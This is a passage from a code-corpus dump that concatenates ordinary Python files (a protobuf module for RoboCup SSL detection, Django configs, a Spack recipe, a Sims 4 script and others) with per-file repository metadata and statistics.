has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='y', full_name='SSL_DetectionRobot.y', index=3,
number=4, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='orientation', full_name='SSL_DetectionRobot.orientation', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_x', full_name='SSL_DetectionRobot.pixel_x', index=5,
number=6, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_y', full_name='SSL_DetectionRobot.pixel_y', index=6,
number=7, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='height', full_name='SSL_DetectionRobot.height', index=7,
number=8, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=163,
serialized_end=314,
)
_SSL_DETECTIONFRAME = _descriptor.Descriptor(
name='SSL_DetectionFrame',
full_name='SSL_DetectionFrame',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_number', full_name='SSL_DetectionFrame.frame_number', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='t_capture', full_name='SSL_DetectionFrame.t_capture', index=1,
number=2, type=1, cpp_type=5, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='t_sent', full_name='SSL_DetectionFrame.t_sent', index=2,
number=3, type=1, cpp_type=5, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='camera_id', full_name='SSL_DetectionFrame.camera_id', index=3,
number=4, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='balls', full_name='SSL_DetectionFrame.balls', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='robots_yellow', full_name='SSL_DetectionFrame.robots_yellow', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='robots_blue', full_name='SSL_DetectionFrame.robots_blue', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=317,
serialized_end=534,
)
_SSL_DETECTIONFRAME.fields_by_name['balls'].message_type = _SSL_DETECTIONBALL
_SSL_DETECTIONFRAME.fields_by_name['robots_yellow'].message_type = _SSL_DETECTIONROBOT
_SSL_DETECTIONFRAME.fields_by_name['robots_blue'].message_type = _SSL_DETECTIONROBOT
DESCRIPTOR.message_types_by_name['SSL_DetectionBall'] = _SSL_DETECTIONBALL
DESCRIPTOR.message_types_by_name['SSL_DetectionRobot'] = _SSL_DETECTIONROBOT
DESCRIPTOR.message_types_by_name['SSL_DetectionFrame'] = _SSL_DETECTIONFRAME
SSL_DetectionBall = _reflection.GeneratedProtocolMessageType('SSL_DetectionBall', (_message.Message,), dict(
DESCRIPTOR = _SSL_DETECTIONBALL,
__module__ = 'messages_robocup_ssl_detection_pb2'
# @@protoc_insertion_point(class_scope:SSL_DetectionBall)
))
_sym_db.RegisterMessage(SSL_DetectionBall)
SSL_DetectionRobot = _reflection.GeneratedProtocolMessageType('SSL_DetectionRobot', (_message.Message,), dict(
DESCRIPTOR = _SSL_DETECTIONROBOT,
__module__ = 'messages_robocup_ssl_detection_pb2'
# @@protoc_insertion_point(class_scope:SSL_DetectionRobot)
))
_sym_db.RegisterMessage(SSL_DetectionRobot)
SSL_DetectionFrame = _reflection.GeneratedProtocolMessageType('SSL_DetectionFrame', (_message.Message,), dict(
DESCRIPTOR = _SSL_DETECTIONFRAME,
__module__ = 'messages_robocup_ssl_detection_pb2'
# @@protoc_insertion_point(class_scope:SSL_DetectionFrame)
))
_sym_db.RegisterMessage(SSL_DetectionFrame)
# @@protoc_insertion_point(module_scope)
| 41.032028 | 1,061 | 0.737381 | 1,570 | 11,530 | 5.111465 | 0.107006 | 0.068785 | 0.034268 | 0.054829 | 0.736449 | 0.670031 | 0.650218 | 0.650218 | 0.638255 | 0.630031 | 0 | 0.046009 | 0.140416 | 11,530 | 280 | 1,062 | 41.178571 | 0.763697 | 0.032871 | 0 | 0.697211 | 1 | 0.003984 | 0.191079 | 0.145037 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01992 | 0 | 0.01992 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a955ddf4eb8066df9dc120c99da7b52c9ff1b87 | 152 | py | Python | neibor/apps.py | BrendaMwiza/neighborhood | 53a4476837324f745470d7aa914214f294be21c6 | [
"MIT"
] | null | null | null | neibor/apps.py | BrendaMwiza/neighborhood | 53a4476837324f745470d7aa914214f294be21c6 | [
"MIT"
] | 3 | 2019-11-03T18:33:57.000Z | 2021-09-08T01:24:33.000Z | neibor/apps.py | BrendaMwiza/neighborhood | 53a4476837324f745470d7aa914214f294be21c6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class NeiborConfig(AppConfig):
    name = 'neibor'
| 16.888889 | 39 | 0.730263 | 18 | 152 | 5.888889 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.164474 | 152 | 8 | 40 | 19 | 0.826772 | 0.138158 | 0 | 0 | 0 | 0 | 0.046512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8a9e1f75933d48a36a913ef4cda57e31a8f6cc8e | 96 | py | Python | src/ttss/Mode.py | tomekzaw/ttss | 8c8fdd9e1e3544010bb3d7fe5d9b2ff59e46f61a | [
"MIT"
] | null | null | null | src/ttss/Mode.py | tomekzaw/ttss | 8c8fdd9e1e3544010bb3d7fe5d9b2ff59e46f61a | [
"MIT"
] | null | null | null | src/ttss/Mode.py | tomekzaw/ttss | 8c8fdd9e1e3544010bb3d7fe5d9b2ff59e46f61a | [
"MIT"
] | null | null | null | from enum import Enum
class Mode(Enum):
    DEPARTURES = 'departure'
    ARRIVALS = 'arrival'
| 13.714286 | 28 | 0.677083 | 11 | 96 | 5.909091 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229167 | 96 | 6 | 29 | 16 | 0.878378 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8aad5b2d0822def37bd3f501b9c5fe5026ac71f8 | 52 | py | Python | hillfit/__init__.py | bilalshaikh42/hillfit | 355413512af17ce123ac2b771e23fe62d878854e | [
"MIT"
] | null | null | null | hillfit/__init__.py | bilalshaikh42/hillfit | 355413512af17ce123ac2b771e23fe62d878854e | [
"MIT"
] | null | null | null | hillfit/__init__.py | bilalshaikh42/hillfit | 355413512af17ce123ac2b771e23fe62d878854e | [
"MIT"
] | null | null | null | from .fitting import HillFit
__version__ = "0.1.3"
| 13 | 28 | 0.730769 | 8 | 52 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 0.153846 | 52 | 3 | 29 | 17.333333 | 0.704545 | 0 | 0 | 0 | 0 | 0 | 0.096154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8ab7adb346214653506dd8ae81e7c5a06b55d55b | 1,291 | py | Python | fragbuilder/basilisk_lib/Mocapy/MocapyExceptions.py | larsbratholm/fragbuilder | e16cbcb190403b5fef49811abd11d16d7ef7fb30 | [
"BSD-2-Clause"
] | 8 | 2015-04-11T17:43:13.000Z | 2021-12-02T10:18:45.000Z | fragbuilder/basilisk_lib/Mocapy/MocapyExceptions.py | larsbratholm/fragbuilder | e16cbcb190403b5fef49811abd11d16d7ef7fb30 | [
"BSD-2-Clause"
] | null | null | null | fragbuilder/basilisk_lib/Mocapy/MocapyExceptions.py | larsbratholm/fragbuilder | e16cbcb190403b5fef49811abd11d16d7ef7fb30 | [
"BSD-2-Clause"
] | 6 | 2015-04-01T07:18:26.000Z | 2021-04-24T11:11:18.000Z | # Mocapy: A parallelized Dynamic Bayesian Network toolkit
#
# Copyright (C) 2004 Thomas Hamelryck
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BASILISK. If not, see <http://www.gnu.org/licenses/>.
"""
Mocapy exception classes.
"""
class MocapyException(Exception): pass
class MocapyVectorException(MocapyException): pass
class MocapyDBNException(MocapyException): pass
class MocapyVMFException(MocapyException): pass
class MocapyGaussianException(MocapyException): pass
class MocapyDiscreteException(MocapyException): pass
class MocapyDirichletException(MocapyException): pass
class MocapyKentException(MocapyException): pass
class MocapyEMException(MocapyException): pass
class MocapyVMException(MocapyException): pass
| 30.023256 | 70 | 0.783114 | 158 | 1,291 | 6.398734 | 0.575949 | 0.080119 | 0.189911 | 0.05638 | 0.081108 | 0.055391 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.155693 | 1,291 | 42 | 71 | 30.738095 | 0.922936 | 0.58017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8aba73b8e02feea78d1362cefdd1ed6854478c36 | 1,853 | py | Python | var/spack/repos/builtin/packages/py-filelock/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/py-filelock/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6 | 2022-01-08T08:41:11.000Z | 2022-03-14T19:28:07.000Z | var/spack/repos/builtin/packages/py-filelock/package.py | foeroyingur/spack | 5300cbbb2e569190015c72d0970d25425ea38647 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyFilelock(PythonPackage):
"""A platform-independent file lock for Python.
This package contains a single module, which implements a platform
independent file lock in Python, which provides a simple way of
inter-process communication"""
homepage = "https://github.com/benediktschmitt/py-filelock"
pypi = "filelock/filelock-3.0.4.tar.gz"
version('3.4.0', sha256='93d512b32a23baf4cac44ffd72ccf70732aeff7b8050fcaf6d3ec406d954baf4')
version('3.0.12', sha256='18d82244ee114f543149c66a6e0c14e9c4f8a1044b5cdaadd0f82159d6a6ff59')
version('3.0.4', sha256='011327d4ed939693a5b28c0fdf2fd9bda1f68614c1d6d0643a89382ce9843a71')
version('3.0.3', sha256='7d8a86350736aa0efea0730e6a7f774195cbb1c2d61134c15f6be576399e87ff')
version('3.0.0', sha256='b3ad481724adfb2280773edd95ce501e497e88fa4489c6e41e637ab3fd9a456c')
version('2.0.13', sha256='d05079e7d7cae7576e192749d3461999ca6b0843d35b0f79f1fa956b0f6fc7d8')
version('2.0.12', sha256='eb4314a9a032707a914b037433ce866d4ed363fce8605d45f0c9d2cd6ac52f98')
version('2.0.11', sha256='e9e370efe86c30b19a2c8c36dd9fcce8e5ce294ef4ed6ac86664b666eaf852ca')
version('2.0.10', sha256='c73bf706d8a0c5722de0b745495fed9cda0e46c0eabb44eb18ee3f00520fa85f')
version('2.0.9', sha256='0f91dce339c9f25d6f2e0733a17e4f9a47b139dffda52619a0e61e013e5c6782')
version('2.0.8', sha256='7e48e4906de3c9a5d64d8f235eb3ae1050dfefa63fd65eaf318cc915c935212b')
depends_on('python@3.6:', when='@3.3:', type=('build', 'run'))
depends_on('python@2.7:2,3.5:', when='@3.1:', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
| 54.5 | 96 | 0.77496 | 179 | 1,853 | 8.005587 | 0.530726 | 0.00977 | 0.037683 | 0.033496 | 0.068388 | 0 | 0 | 0 | 0 | 0 | 0 | 0.312236 | 0.104695 | 1,853 | 33 | 97 | 56.151515 | 0.551537 | 0.212628 | 0 | 0 | 0 | 0 | 0.6363 | 0.510431 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8aba9850c786140b6211e9fd7a9163f187300909 | 199 | py | Python | yield_next.py | joshavenue/python_notebook | 8d46ba88ef4f05dea6801364bc134edb981df02e | [
"Unlicense"
] | null | null | null | yield_next.py | joshavenue/python_notebook | 8d46ba88ef4f05dea6801364bc134edb981df02e | [
"Unlicense"
] | null | null | null | yield_next.py | joshavenue/python_notebook | 8d46ba88ef4f05dea6801364bc134edb981df02e | [
"Unlicense"
] | null | null | null | def gen():
    yield 3 # Like return but one by one
    yield 'wow'
    yield -1
    yield 1.2
x = gen()
print(next(x)) # Use next() function to go one by one
print(next(x))
print(next(x))
print(next(x)) | 15.307692 | 55 | 0.628141 | 39 | 199 | 3.205128 | 0.487179 | 0.288 | 0.32 | 0.24 | 0.24 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0.025806 | 0.221106 | 199 | 13 | 56 | 15.307692 | 0.780645 | 0.316583 | 0 | 0.4 | 0 | 0 | 0.022388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.1 | 0.4 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8abbeaf85fe20109216100fa91b3ee91af6a398d | 2,416 | py | Python | doc/generate_autodoc_index.py | Lezval/horizon | 0e08f4f92bed0a07102c77be12969a095aac5a2a | [
"Apache-2.0"
] | 2 | 2015-05-18T13:50:20.000Z | 2015-05-18T14:47:08.000Z | doc/generate_autodoc_index.py | Lezval/horizon | 0e08f4f92bed0a07102c77be12969a095aac5a2a | [
"Apache-2.0"
] | null | null | null | doc/generate_autodoc_index.py | Lezval/horizon | 0e08f4f92bed0a07102c77be12969a095aac5a2a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Generates files for sphinx documentation using a simple Autodoc based
template.
To use, just run as a script:
$ python doc/generate_autodoc_index.py
"""
import os
base_dir = os.path.dirname(os.path.abspath(__file__))
RSTDIR = os.path.join(base_dir, "source", "sourcecode")
SRCS = {'dashboard': os.path.join(base_dir, "..", "openstack-dashboard"),
'django_openstack': os.path.join(base_dir, "..", "django-openstack")}
def find_autodoc_modules(module_name, sourcedir):
"""returns a list of modules in the SOURCE directory"""
modlist = []
os.chdir(os.path.join(sourcedir, module_name))
print "SEARCHING %s" % sourcedir
for root, dirs, files in os.walk("."):
for filename in files:
if filename.endswith(".py"):
# root = ./dashboard/test/unit
# filename = base.py
# remove the pieces of the root
elements = root.split(os.path.sep)
# replace the leading "." with the module name
elements[0] = module_name
# and get the base module name
base, extension = os.path.splitext(filename)
if not (base == "__init__"):
elements.append(base)
result = ".".join(elements)
#print result
modlist.append(result)
return modlist
if not(os.path.exists(RSTDIR)):
os.mkdir(RSTDIR)
INDEXOUT = open("%s/autoindex.rst" % RSTDIR, "w")
INDEXOUT.write("Source Code Index\n")
INDEXOUT.write("=================\n")
INDEXOUT.write(".. toctree::\n")
INDEXOUT.write(" :maxdepth: 1\n")
INDEXOUT.write("\n")
for modulename in SRCS:
for module in find_autodoc_modules(modulename, SRCS[modulename]):
generated_file = "%s/%s.rst" % (RSTDIR, module)
print "Generating %s" % generated_file
INDEXOUT.write(" %s\n" % module)
FILEOUT = open(generated_file, "w")
FILEOUT.write("The :mod:`%s` Module\n" % module)
FILEOUT.write("=============================="
"=============================="
"==============================\n")
FILEOUT.write(".. automodule:: %s\n" % module)
FILEOUT.write(" :members:\n")
FILEOUT.write(" :undoc-members:\n")
FILEOUT.write(" :show-inheritance:\n")
FILEOUT.close()
INDEXOUT.close()
| 35.014493 | 77 | 0.561258 | 275 | 2,416 | 4.84 | 0.392727 | 0.040571 | 0.030053 | 0.031555 | 0.038317 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001118 | 0.25952 | 2,416 | 68 | 78 | 35.529412 | 0.742873 | 0.076159 | 0 | 0 | 1 | 0 | 0.204478 | 0.045771 | 0 | 0 | 0 | 0.029412 | 0 | 0 | null | null | 0 | 0.022727 | null | null | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76e1ac4521176e0f74fc909837b2547afdae25b0 | 4,268 | py | Python | Scripts/simulation/situations/visiting/ungreeted_player_visiting_npc_situation.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/situations/visiting/ungreeted_player_visiting_npc_situation.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/situations/visiting/ungreeted_player_visiting_npc_situation.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\situations\visiting\ungreeted_player_visiting_npc_situation.py
# Compiled at: 2016-09-08 04:20:41
# Size of source mod 2**32: 5618 bytes
from sims4.tuning.instances import lock_instance_tunables
from sims4.tuning.tunable_base import GroupNames
from sims4.utils import classproperty
from situations.base_situation import _RequestUserData
from situations.bouncer.bouncer_request import SelectableSimRequestFactory
from situations.situation_complex import SituationStateData
from situations.situation_types import SituationCreationUIOption
from situations.visiting.visiting_situation_common import VisitingNPCSituation
import build_buy, distributor.ops, role.role_state, sims4.tuning.tunable, situations.bouncer.bouncer_types, situations.situation_complex
class UngreetedPlayerVisitingNPCSituation(VisitingNPCSituation):
INSTANCE_TUNABLES = {'ungreeted_player_sims': sims4.tuning.tunable.TunableTuple(situation_job=situations.situation_job.SituationJob.TunableReference(description='\n The job given to player sims in the ungreeted situation.\n '),
role_state=role.role_state.RoleState.TunableReference(description='\n The role state given to player sims in the ungreeted situation.\n '),
tuning_group=(GroupNames.ROLES))}
@classmethod
def _get_greeted_status(cls):
return situations.situation_types.GreetedStatus.WAITING_TO_BE_GREETED
@classmethod
def _states(cls):
return (SituationStateData(1, UngreetedPlayerVisitingNPCState),)
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.ungreeted_player_sims.situation_job, cls.ungreeted_player_sims.role_state)]
@classmethod
def default_job(cls):
return cls.ungreeted_player_sims.situation_job
@classproperty
def distribution_override(cls):
return True
def start_situation(self):
super().start_situation()
self._change_state(UngreetedPlayerVisitingNPCState())
build_buy.register_build_buy_enter_callback(self._on_build_buy_enter)
build_buy.register_build_buy_exit_callback(self._on_build_buy_exit)
def load_situation(self):
build_buy.register_build_buy_enter_callback(self._on_build_buy_enter)
build_buy.register_build_buy_exit_callback(self._on_build_buy_exit)
return super().load_situation()
def _destroy(self):
build_buy.unregister_build_buy_exit_callback(self._on_build_buy_exit)
build_buy.unregister_build_buy_enter_callback(self._on_build_buy_enter)
super()._destroy()
def _issue_requests(self):
request = SelectableSimRequestFactory(self, callback_data=_RequestUserData(role_state_type=(self.ungreeted_player_sims.role_state)),
job_type=(self.ungreeted_player_sims.situation_job),
exclusivity=(self.exclusivity))
self.manager.bouncer.submit_request(request)
def _on_sim_removed_from_situation_prematurely(self, sim, sim_job):
if self.num_of_sims > 0:
return
else:
return self.manager.is_player_greeted() or None
self._self_destruct()
def get_create_op(self, *args, **kwargs):
return distributor.ops.SetWallsUpOrDown(True)
def get_delete_op(self):
return distributor.ops.SetWallsUpOrDown(False)
def _on_build_buy_enter(self):
op = distributor.ops.SetWallsUpOrDown(False)
distributor.system.Distributor.instance().add_op(self, op)
def _on_build_buy_exit(self):
op = distributor.ops.SetWallsUpOrDown(True)
distributor.system.Distributor.instance().add_op(self, op)
lock_instance_tunables(UngreetedPlayerVisitingNPCSituation, exclusivity=(situations.bouncer.bouncer_types.BouncerExclusivityCategory.UNGREETED),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE),
duration=0)
class UngreetedPlayerVisitingNPCState(situations.situation_complex.SituationState):
pass | 46.901099 | 269 | 0.756795 | 507 | 4,268 | 6.04931 | 0.331361 | 0.054777 | 0.026084 | 0.03717 | 0.251386 | 0.182589 | 0.182589 | 0.182589 | 0.1239 | 0.071731 | 0 | 0.020506 | 0.165886 | 4,268 | 91 | 270 | 46.901099 | 0.841011 | 0.0806 | 0 | 0.149254 | 0 | 0 | 0.058193 | 0.00536 | 0 | 0 | 0 | 0 | 0 | 1 | 0.208955 | false | 0.014925 | 0.134328 | 0.104478 | 0.537313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
76e3ac759cb46610e24e4c7d2702c871cceef470 | 1,129 | py | Python | server/user/migrations/0001_initial.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 48 | 2018-09-30T11:07:52.000Z | 2021-12-07T03:32:59.000Z | server/user/migrations/0001_initial.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 100 | 2018-10-13T18:37:25.000Z | 2021-11-11T12:14:45.000Z | server/user/migrations/0001_initial.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 11 | 2018-10-08T14:59:33.000Z | 2022-03-02T03:21:09.000Z | # Generated by Django 2.1.12 on 2019-10-04 09:32
import random
from django.db import migrations, models
def gen_hash():
    return f'{random.randrange(10000):04d}'
class Migration(migrations.Migration):
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user', models.IntegerField(unique=True)),
                ('hash', models.TextField(default=gen_hash)),
                ('group', models.TextField()),
                ('nickname', models.TextField(null=True)),
                ('name', models.TextField(null=True)),
                ('sno', models.TextField(null=True)),
                ('tel', models.TextField(null=True)),
                ('email', models.TextField(null=True)),
                ('token', models.TextField()),
            ],
            options={
                'permissions': [('full', '管理个人信息')],
                'default_permissions': (),
            },
        ),
    ]
| 28.225 | 114 | 0.522586 | 104 | 1,129 | 5.615385 | 0.576923 | 0.205479 | 0.162671 | 0.196918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030223 | 0.325952 | 1,129 | 39 | 115 | 28.948718 | 0.737188 | 0.040744 | 0 | 0 | 1 | 0 | 0.109158 | 0.026827 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.068966 | 0.034483 | 0.275862 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76eed02ced74012c47f21df319d4a40ffb5476f9 | 89 | py | Python | poke_django/trainer/apps.py | XrossFox/Poke-Django-Api-Test | 2e272b055fbeb633edb64fb2a3d6a720a50045f8 | [
"MIT"
] | 2 | 2016-10-21T21:52:08.000Z | 2021-10-19T02:19:43.000Z | poke_django/trainer/apps.py | XrossFox/Poke-Django-Api-Test | 2e272b055fbeb633edb64fb2a3d6a720a50045f8 | [
"MIT"
] | 2 | 2020-06-05T23:51:09.000Z | 2020-10-11T20:12:37.000Z | blackjack_trainer/trainer/apps.py | cberry216/blackjack-strategy-trainer | ec813a3dad9158aaf98f50dd61ab52b122c19382 | [
"MIT"
] | 4 | 2016-10-24T19:17:48.000Z | 2018-05-11T11:53:12.000Z | from django.apps import AppConfig
class TrainerConfig(AppConfig):
name = 'trainer'
| 14.833333 | 33 | 0.752809 | 10 | 89 | 6.7 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168539 | 89 | 5 | 34 | 17.8 | 0.905405 | 0 | 0 | 0 | 0 | 0 | 0.078652 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
76f27d8974c6c64d388588d2537e66e0ab436004 | 1,438 | py | Python | plynx/base/resource.py | khaxis/plynx | 20768470261fc5f29cb660c815c479b49765b2fe | [
"Apache-2.0"
] | 137 | 2018-11-14T07:13:33.000Z | 2020-02-03T12:32:35.000Z | plynx/base/resource.py | khaxis/plynx | 20768470261fc5f29cb660c815c479b49765b2fe | [
"Apache-2.0"
